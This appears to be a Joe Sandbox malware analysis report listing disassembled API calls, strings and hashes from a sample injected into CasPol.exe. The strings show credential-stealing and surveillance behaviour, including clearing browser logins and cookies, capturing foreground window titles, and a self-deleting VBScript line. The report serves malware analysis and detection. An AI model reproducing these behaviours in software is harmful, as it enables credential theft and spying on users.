                                                                                                                    • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                    • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                    • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                    • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                    • __freea.LIBCMT ref: 100087D5
                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                    • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                    • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                    • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                    • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                    • API String ID: 3472027048-1236744412
                                                                                                                    • Opcode ID: c560560ec7d4d1dc68260b17dc6ebfb42e9a5e0b1871810b26060d25c010d2d5
                                                                                                                    • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                    • Opcode Fuzzy Hash: c560560ec7d4d1dc68260b17dc6ebfb42e9a5e0b1871810b26060d25c010d2d5
                                                                                                                    • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQuerySleepValue
                                                                                                                    • String ID: @CG$exepath$BG
                                                                                                                    • API String ID: 4119054056-3221201242
                                                                                                                    • Opcode ID: da9c82b859fadff46026edc260230fa4890c9be1e72736e6911473bc79de2098
                                                                                                                    • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                    • Opcode Fuzzy Hash: da9c82b859fadff46026edc260230fa4890c9be1e72736e6911473bc79de2098
                                                                                                                    • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                    APIs
                                                                                                                    • EnumDisplayMonitors.USER32(00000000,00000000,0041870C,00000000), ref: 00418632
                                                                                                                    • EnumDisplayDevicesW.USER32(?), ref: 00418662
                                                                                                                    • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186D7
                                                                                                                    • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DisplayEnum$Devices$Monitors
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1432082543-0
                                                                                                                    • Opcode ID: cb966e6306bdb11071c31b68200240cf75060c1ea1cbf38c1b590a92a7f3e121
                                                                                                                    • Instruction ID: 3487619ef7b62fdcdebcbe554659b8730097b511a659717e719cc71a18cb279a
                                                                                                                    • Opcode Fuzzy Hash: cb966e6306bdb11071c31b68200240cf75060c1ea1cbf38c1b590a92a7f3e121
                                                                                                                    • Instruction Fuzzy Hash: 2F2150722043046BD220EF16DC45EABBBECEFD1754F10052FB549D2191EA78AA45C6AA
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 188215759-0
                                                                                                                    • Opcode ID: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                    • Instruction ID: a679ad691b1e431344cd65e278b90b5c6278f623fb05ceb41248f345421e7781
                                                                                                                    • Opcode Fuzzy Hash: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                    • Instruction Fuzzy Hash: 30215E725093009BC304DFA5D98589FB7E8EFC8754F044A2EF585D3251EA35EA49CBA3
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                      • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                      • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                                    • String ID: [ $ ]
                                                                                                                    • API String ID: 3309952895-93608704
                                                                                                                    • Opcode ID: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                    • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                    • Opcode Fuzzy Hash: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                    • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3604237281-0
                                                                                                                    • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                    • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                    • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                    • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                    • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                    • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                    • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                    • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                    • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                    • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                    APIs
                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                      • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                      • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 737400349-0
                                                                                                                    • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                    • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                    • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                    • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                    • GetLastError.KERNEL32(?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                    • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                    • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                    • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                    • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                    • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                    • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                    • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4116985748-0
                                                                                                                    • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                    • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                    • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                    • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                    • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                    • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                    • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                    • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID: 4[G$4[G
                                                                                                                    • API String ID: 2931989736-4028565467
                                                                                                                    • Opcode ID: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                    • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                    • Opcode Fuzzy Hash: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                    • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 1000655C
                                                                                                                      • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                                                      • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                      • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                    • String ID: *?$.
                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                    • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                    • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID: $vD
                                                                                                                    • API String ID: 1807457897-3636070802
                                                                                                                    • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                    • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                    • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                    • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                    APIs
                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                                                                                                      • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                                                                                                      • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                      • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                    • String ID: image/jpeg
                                                                                                                    • API String ID: 1291196975-3785015651
                                                                                                                    • Opcode ID: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                    • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                                                                                                    • Opcode Fuzzy Hash: 203489c16dbcee2c70a941053242b98b65a57a30b46d0c0344179c2238acd4ed
                                                                                                                    • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                    APIs
                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
